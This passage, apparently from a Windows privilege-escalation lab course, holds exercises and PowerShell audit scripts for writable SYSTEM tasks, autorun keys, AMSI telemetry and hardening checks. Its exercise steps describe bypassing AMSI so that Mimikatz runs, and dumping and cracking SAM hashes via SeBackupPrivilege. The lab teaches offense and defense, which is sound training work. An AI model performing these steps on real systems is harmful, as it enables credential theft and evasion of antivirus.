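    try { [IO.File]::Open($Path, 'Open', 'Write', 'ReadWrite').Dispose(); $true } catch { $false }
}

function Find-WritableSystemTasks {
    Get-ScheduledTask | Where-Object {
        $_.State -ne 'Disabled' -and $_.Principal.UserId -in 'SYSTEM', 'S-1-5-18', 'NT AUTHORITY\SYSTEM'
    } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }     # COM-handler actions have no Execute path
            $targets = @([Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"')))
            # Interpreters such as powershell.exe are not writable, but the script they run may be.
            if ($action.Arguments) {
                $targets += [regex]::Matches($action.Arguments, '"[^"]+\.(ps1|bat|cmd|vbs|js)"|\S+\.(ps1|bat|cmd|vbs|js)', 'IgnoreCase') |
                            ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Value.Trim('"')) }
            }
            foreach ($t in $targets) {
                [pscustomobject]@{
                    Task     = "$($task.TaskPath)$($task.TaskName)"
                    RunsAs   = $task.Principal.UserId
                    Target   = $t
                    Exists   = Test-Path -LiteralPath $t -PathType Leaf
                    Writable = Test-FileWritable -Path $t
                }
            }
        }
    }
}

# Steps 1-2, from an elevated PowerShell:
#   New-Item -ItemType Directory -Path C:\Tasks -Force
#   Set-Content -Path C:\Tasks\cleanup.ps1 -Value 'Get-Date | Out-File C:\Tasks\last-run.txt'
#   icacls C:\Tasks\cleanup.ps1 /grant "BUILTIN\Users:(M)"
#   schtasks /create /tn LabCleanup /sc minute /mo 5 /ru SYSTEM /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Tasks\cleanup.ps1"
# Step 5, remediation for the file and its directory (FILE_DELETE_CHILD on the directory would
# let a user replace the file no matter what the file's ACL says):
#   icacls C:\Tasks\cleanup.ps1 /inheritance:r /grant:r "BUILTIN\Administrators:(F)" "NT AUTHORITY\SYSTEM:(F)" "BUILTIN\Users:(RX)"
#   icacls C:\Tasks /inheritance:r /grant:r "BUILTIN\Administrators:(OI)(CI)(F)" "NT AUTHORITY\SYSTEM:(OI)(CI)(F)" "BUILTIN\Users:(OI)(CI)(RX)"

Find-WritableSystemTasks | Where-Object Writable | Format-Table -AutoSize
```

Run the audit as the standard user before step 3 (LabCleanup should appear with Writable set to True) and again after step 5 (it should not). A target that does not exist on disk is a separate finding: if its directory is user-writable, the user can create the file SYSTEM will run.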


Exercise 12: Registry Autorun Persistence and Escalation

Difficulty: Intermediate | Time: 20 minutes

  1. Enumerate the autorun registry keys on your lab VM: Run and RunOnce under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion and under HKCU, plus the WOW6432Node copies on 64-bit Windows.
  2. Check file permissions on each referenced binary, parsing the executable out of the command line (quoted paths, arguments, environment variables).
  3. If any HKLM-referenced binary is writable by a standard user, document the privilege escalation opportunity: it runs in the context of every user who logs on, administrators included. HKCU entries run only as the owner of that hive, which makes them persistence rather than escalation.
  4. Add a benign autorun entry to HKCU and verify it executes on login.
  5. Verify detection: check whether Microsoft Defender or other AV alerts on the autorun modification. If Sysmon is installed, Event ID 13 (registry value set) on these keys is the usual detection.

Deliverable: Registry autorun analysis report.
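Added example for Exercise 12 (not part of the original exercise text): a PowerShell audit that enumerates the Run and RunOnce keys in both hives, extracts the executable from each command line (quoted, unquoted, with arguments or environment variables), tests whether the current user can modify it, and adds the benign HKCU entry for step 4. The entry name LabAutorun and the marker file are lab assumptions.

```powershell
# Added example (not from the original page): autorun entries, the binaries behind them, and whether
# the current user can modify those binaries.
$AutorunKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'

function Get-ExecutableFromCommandLine {
    param([string]$CommandLine)
    $c = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($c.StartsWith('"')) {                       # quoted: the executable is the first quoted token
        $end = $c.IndexOf('"', 1)
        if ($end -gt 1) { return $c.Substring(1, $end - 1) }
        return $c.Trim('"')
    }
    # Unquoted: take everything up to the first token ending in .exe, otherwise the first token.
    $m = [regex]::Match($c, '^(.+?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($c -split ' ')[0]
}

function Test-FileWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    try { [IO.File]::Open($Path, 'Open', 'Write', 'ReadWrite').Dispose(); $true } catch { $false }
}

function Get-AutorunTargets {
    foreach ($key in $AutorunKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $entries = (Get-ItemProperty -Path $key).PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }
        foreach ($e in $entries) {
            $cmd = [string]$e.Value
            $exe = Get-ExecutableFromCommandLine -CommandLine $cmd
            [pscustomobject]@{
                Key         = $key
                Entry       = $e.Name
                CommandLine = $cmd
                Executable  = $exe
                Exists      = Test-Path -LiteralPath $exe -PathType Leaf
                Writable    = Test-FileWritable -Path $exe
                Unquoted    = (-not $cmd.StartsWith('"')) -and ($exe -match ' ')   # same class of bug as Exercise 2
            }
        }
    }
}

# Step 4: a benign HKCU entry that appends a timestamp on each logon. Remove it afterwards with
# Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name LabAutorun
function Add-LabAutorun {
    New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name LabAutorun -PropertyType String -Force `
        -Value "cmd.exe /c echo %DATE% %TIME% >> `"$env:USERPROFILE\autorun-ran.txt`"" | Out-Null
}

Get-AutorunTargets | Format-Table Key, Entry, Executable, Exists, Writable, Unquoted -AutoSize
```

An HKLM entry with Writable set to True is the escalation finding for step 3; an Unquoted entry whose path contains spaces is the Exercise 2 problem in a different key and should be cross-referenced in the report.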


Exercise 13: AMSI Bypass Lab

Difficulty: Advanced | Time: 30 minutes

  1. Attempt to run a PowerShell script that AMSI-backed antivirus flags (e.g., Invoke-Mimikatz).
  2. Observe the AMSI block: PowerShell reports that the script "contains malicious content and has been blocked by your antivirus software", and Defender records a detection.
  3. Research and implement an AMSI bypass technique. The widely copied one-liners (the amsiInitFailed reflection trick, for example) are themselves signatured, so expect to adapt one rather than paste it.
  4. Verify the previously blocked script now executes.
  5. Document the bypass technique and its detection opportunities: the bypass text itself passing through AMSI before it takes effect, PowerShell script block logging (Event ID 4104, where suspicious blocks are logged at Warning level even without the policy), and the memory-patching indicators a bypass leaves in the powershell.exe process.

Deliverable: AMSI bypass documentation with defensive detection guidance.
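Added example for Exercise 13 (not part of the original exercise text): a PowerShell script that records AMSI's visible state in the current session (module loaded, registered providers, script block logging policy) and pulls the two telemetry sources the detection side of step 5 rests on. It does not implement a bypass. Defender's provider CLSID in the comment and the Get-MpThreatDetection cmdlet assume Microsoft Defender is the installed AV.

```powershell
# Added example (not from the original page): AMSI state in this session and the detection
# telemetry to capture before and after the bypass in step 3.
function Get-AmsiState {
    # amsi.dll is loaded into powershell.exe on first use; a missing module means nothing is being scanned.
    $amsiLoaded = [bool]((Get-Process -Id $PID).Modules | Where-Object { $_.ModuleName -ieq 'amsi.dll' })
    # Registered AMSI providers (Defender's CLSID is {2781761E-28E0-4109-99FE-B9D127C57AFE}).
    $providers = Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue |
                 ForEach-Object {
                     $clsid = $_.PSChildName
                     $name = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\$clsid" -ErrorAction SilentlyContinue).'(default)'
                     "$clsid $name"
                 }
    $sbl = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' `
               -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    [pscustomobject]@{
        AmsiDllLoaded      = $amsiLoaded
        Providers          = ($providers -join '; ')
        ScriptBlockLogging = if ($sbl -eq 1) { 'enabled by policy' } else { 'not enabled (suspicious blocks are still logged at Warning)' }
    }
}

function Get-AmsiDetectionEvents {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    # 4104 at Warning level = script blocks PowerShell itself considered suspicious, logged regardless of policy.
    $blocks = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; Level = 3; StartTime = $since } -ErrorAction SilentlyContinue |
              ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; Source = 'PS-4104'; Detail = ($_.Message -split "`n")[0] } }
    # Defender's own detections; the AMSI-sourced ones carry an "amsi:" resource.
    $defender = Get-MpThreatDetection -ErrorAction SilentlyContinue | Where-Object { $_.InitialDetectionTime -gt $since } |
                ForEach-Object { [pscustomobject]@{ Time = $_.InitialDetectionTime; Source = 'Defender'; Detail = "$($_.ThreatID) $($_.Resources -join ',')" } }
    @($blocks) + @($defender) | Sort-Object Time
}

Get-AmsiState | Format-List
Get-AmsiDetectionEvents | Format-Table -AutoSize -Wrap
```

Capture the output of both functions before step 1, after the block in step 2, and after the bypass in step 4. The difference between the second and third captures is the detection story for the deliverable: the bypass either produced its own 4104 or Defender event before taking effect, or it did not, and that is what the defensive guidance should say.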


Exercise 14: SeBackupPrivilege Exploitation

Difficulty: Advanced | Time: 30 minutes

  1. Create a user account and add it to the Backup Operators group, which grants SeBackupPrivilege and SeRestorePrivilege. UAC strips these privileges from an interactive logon of that group's members, so verify with whoami /priv; if the privilege is missing, use an elevated prompt (if UAC lets this user elevate) or a non-filtered logon such as WinRM.
  2. Use the privilege to copy the SAM and SYSTEM registry hives. Copying the files under C:\Windows\System32\config directly fails because they are locked; reg save enables the privilege for itself and saves the hives through the registry API.
  3. Transfer the hives to your attack machine.
  4. Extract password hashes using Impacket's secretsdump.py in LOCAL mode.
  5. Crack an NT hash (hashcat mode 1000) to verify the technique worked.

Deliverable: Complete exploitation chain with hash extraction evidence.


Exercise 15: Windows Privilege Escalation Report

Difficulty: Advanced | Time: 60 minutes

Using your lab VM configured with multiple vulnerabilities, perform a complete privilege escalation assessment.

  1. Start as a standard (non-administrative) user, domain or local depending on how the lab VM is joined.
  2. Run automated enumeration tools.
  3. Identify and exploit at least two different privilege escalation vectors.
  4. Write a professional penetration test report including executive summary, technical findings with evidence, risk ratings, and remediation recommendations.

Deliverable: Full penetration test report following industry standards.


🔵 Blue Team Exercise: Windows Hardening

Difficulty: Intermediate | Time: 45 minutes

  1. Audit all services for unquoted paths and fix them.
  2. Review service accounts and strip privileges they do not need. SeImpersonatePrivilege is the one the Potato exercises depend on; where a service account must keep it, treat that service as SYSTEM-equivalent in your threat model.
  3. Disable AlwaysInstallElevated in both the machine and the user policy.
  4. Enable Credential Guard and LSA Protection (RunAsPPL), and confirm both are actually running, not just configured.
  5. Configure Windows Event Log monitoring for privilege escalation indicators: 4672, 4673 and 4674 in the Security log (4673 and 4674 only appear when the "Sensitive Privilege Use" audit subcategory is enabled) and 7045 (new service installed) in the System log.
  6. Deploy and configure LAPS so that each machine's local administrator password is unique and rotated.
  7. Re-run WinPEAS and verify that the findings from the earlier exercises are gone.

Deliverable: Windows hardening checklist with before/after evidence.
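Added example for the Blue Team exercise (not part of the original exercise text): a PowerShell report that verifies the hardening items that can be checked from the machine itself (steps 3 to 6) and a query for the four event IDs in step 5. Run it elevated, before and after the hardening pass, for the before/after evidence; the service-level checks for steps 1 and 2 are the same ones the Exercise 2 and Exercise 4 scripts perform. The registry and WMI locations are the documented ones for each feature; the event property positions used for 7045 are the standard event-data order.

```powershell
# Added example (not from the original page): verify hardening state and pull the escalation events.
function Get-PrivEscHardeningReport {
    # Credential Guard: configured in the registry, but "running" is what counts.
    $dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuardRunning = [bool]($dg -and ($dg.SecurityServicesRunning -contains 1))   # 1 = Credential Guard, 2 = HVCI
    # LSA Protection (RunAsPPL); Wininit event 12 in the System log confirms lsass started protected.
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $lsassProtected = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 12 } -MaxEvents 50 -ErrorAction SilentlyContinue |
                      Where-Object { $_.Message -match 'protected process' } | Select-Object -First 1
    # AlwaysInstallElevated must be absent or 0 in both hives.
    $aie = foreach ($k in 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer', 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer') {
        (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    # LAPS: the Windows LAPS policy key, or the legacy LAPS (AdmPwd) policy.
    $lapsNew = Test-Path -Path 'HKLM:\SOFTWARE\Microsoft\Policies\LAPS'
    $lapsLegacy = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft Services\AdmPwd' -ErrorAction SilentlyContinue).AdmPwdEnabled -eq 1
    # 4673/4674 are only generated when this subcategory is audited.
    $audit = (auditpol /get /subcategory:"Sensitive Privilege Use" 2>$null | Where-Object { $_ -match 'Sensitive Privilege Use' }) -join ' '

    [pscustomobject]@{
        CredentialGuardRunning     = $credGuardRunning
        RunAsPPL                   = $lsa.RunAsPPL
        LsassProtectedEventSeen    = [bool]$lsassProtected
        AlwaysInstallElevatedOff   = -not ($aie -contains 1)
        LapsConfigured             = ($lapsNew -or $lapsLegacy)
        SensitivePrivilegeUseAudit = $audit
    }
}

function Get-PrivEscEvents {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    # 4672: special privileges assigned at logon; 4673/4674: a privilege was used or its use attempted.
    # Properties[1] is SubjectUserName for all three; the privilege list is read from the message text.
    $sec = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4672, 4673, 4674; StartTime = $since } -ErrorAction SilentlyContinue |
           ForEach-Object {
               $privs = if ($_.Message -match 'Privileges:\s*([^\r\n]+)') { $Matches[1].Trim() } else { '' }
               [pscustomobject]@{ Time = $_.TimeCreated; Id = $_.Id; Subject = $_.Properties[1].Value; Detail = $privs }
           }
    # 7045: a new service was installed; event data is ServiceName, ImagePath, ServiceType, StartType, AccountName.
    $svc = Get-WinEvent -FilterHashtable @{ LogName = 'System'; ProviderName = 'Service Control Manager'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue |
           ForEach-Object { [pscustomobject]@{ Time = $_.TimeCreated; Id = $_.Id; Subject = $_.Properties[4].Value; Detail = "$($_.Properties[0].Value) -> $($_.Properties[1].Value)" } }
    @($sec) + @($svc) | Sort-Object Time
}

Get-PrivEscHardeningReport | Format-List
Get-PrivEscEvents -Hours 24 | Group-Object Id | Select-Object Name, Count
```

The 7045 rows are the ones to read line by line: every service created during Exercises 2 and 4 should be there with its image path and account, which is exactly what a SOC rule on this event would have caught. 4672 fires for every administrative logon and is volume, not signal, so the report should say which of the four IDs it recommends alerting on and which it recommends only collecting.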